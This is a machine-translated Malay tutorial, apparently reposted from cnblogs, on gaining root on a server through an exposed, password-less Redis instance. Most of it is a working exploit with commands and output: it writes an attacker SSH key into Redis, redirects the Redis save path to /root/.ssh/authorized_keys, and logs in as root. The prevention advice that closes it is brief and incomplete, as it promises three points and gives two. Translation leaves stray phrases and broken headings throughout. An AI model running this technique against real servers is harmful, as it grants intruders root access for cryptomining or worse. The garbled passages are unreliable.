Rumah > pangkalan data > Redis > Analisis ringkas tentang prinsip perlombongan Redis dan cara mencegahnya (perkongsian kemahiran)

Analisis ringkas tentang prinsip perlombongan Redis dan cara mencegahnya (perkongsian kemahiran)

青灯夜游
Lepaskan: 2022-01-24 10:05:08
ke hadapan
1853 orang telah melayarinya

Artikel ini akan bercakap tentang prinsip perlombongan Redis, lihat cara mencegahnya, dan berkongsi teknik pencegahan saya harap ia akan membantu semua orang!

Analisis ringkas tentang prinsip perlombongan Redis dan cara mencegahnya (perkongsian kemahiran)

Penulis juga telah diserang oleh virus perlombongan, yang sangat tidak selesa, tetapi sebenarnya, selagi anda memahami cara pencerobohan, ia sangat mudah untuk mencegahnya. Hari ini kami akan menunjukkan cara untuk lulus Redis melakukan peningkatan keistimewaan untuk mendapatkan pengguna Root pelayan jauh. [Cadangan berkaitan: Tutorial video Redis]

1 Mula-mula kami memerlukan beberapa prasyarat

  • Syarat 1: Anda Didahulukan. mesti ada Redis, dan kita perlu tahu portnya [lalai 6379];

  • Syarat 2: Kata laluan Redis tidak boleh terlalu rumit, atau tiada kata laluan; >

  • Syarat 3: Pengguna yang memulakan Redis adalah sebaik-baiknya pengguna Root, yang lebih merosakkan

2 🎜>

    2.1 Buat sepasang kunci rahsia
  • Jana pasangan melalui ssh-keygen Sudah tentu, anda boleh menggunakan yang anda sudah ada tanpa sebarang masalah.

Seterusnya, nilai kunci serangan dijana melalui kunci awam
root@kali:/usr/local/src# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Salin selepas log masuk

Kandungan adalah seperti berikut
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
Salin selepas log masuk

Tujuan menambah dua baris baharu sebelum dan selepas di sini adalah untuk menghalang sambungan data Bersama-sama mereka menyebabkan masalah kegagalan.
root@kali:/tmp/rediskey# cat foo.txt 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
Salin selepas log masuk

    2.2 Konfigurasikan Kunci kepada Redis
  • Operasi adalah seperti berikut:

Log masuk ke Redis untuk menyemak sama ada ia telah ditulis Masukkan Redis.
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK
Salin selepas log masuk

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
Salin selepas log masuk
    2.3 Gantikan fail sistem melalui mekanisme penjimatan Redis
  • Lihat operasi berikut

Di kali ini, kami log masuk ke hos jauh untuk melihat kesannya.
192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit
Salin selepas log masuk

OK, kami telah berjaya meningkatkan keistimewaan di sini, jadi mari kita lihat apakah fail yang dieksport? Sebenarnya, ia hanyalah bentuk fail Redis yang disimpan Jika anda berminat, anda boleh membukanya sendiri dan melihatnya tidak akan ditunjukkan di sini.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w
Salin selepas log masuk

3. Bagaimana untuk mencegah

Kerentanan ini cukup kuat sekarang, tambahkannya pada tugas yang dijadualkan untuk melaksanakan beberapa skrip dan kemudian Apa mengenai jangkitan kumpulan?

Teknik pencegahan adalah seperti berikut:

    Redis tidak seharusnya mendengar pada IP berbahaya, sila tambahkan kawalan firewall;
  • Redis mesti meningkatkan sekatan kata laluan, dan ia tidak boleh menjadi kata laluan yang lemah;

  • Ikuti tiga perkara di atas untuk mengelakkan perlombongan Redis, tiada masalah

    Untuk lebih banyak pengetahuan berkaitan pengaturcaraan, sila lawati:
  • Pengenalan kepada Pengaturcaraan
  • ! !

Atas ialah kandungan terperinci Analisis ringkas tentang prinsip perlombongan Redis dan cara mencegahnya (perkongsian kemahiran). Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:cnblogs.com
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan